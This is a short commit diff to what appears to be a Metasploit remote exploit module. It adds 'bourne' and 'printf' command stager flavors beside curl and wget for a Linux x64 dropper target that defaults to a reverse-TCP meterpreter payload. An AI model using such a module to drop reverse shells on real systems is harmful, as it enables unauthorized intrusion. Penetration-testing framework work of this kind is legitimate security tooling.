add in bourne and printf command stager flavors for Linux target
This commit is contained in:
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Type' => :dropper,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X64],
|
||||
'CmdStagerFlavor' => [ 'curl', 'wget' ],
|
||||
'CmdStagerFlavor' => [ 'curl', 'wget', 'bourne', 'printf' ],
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user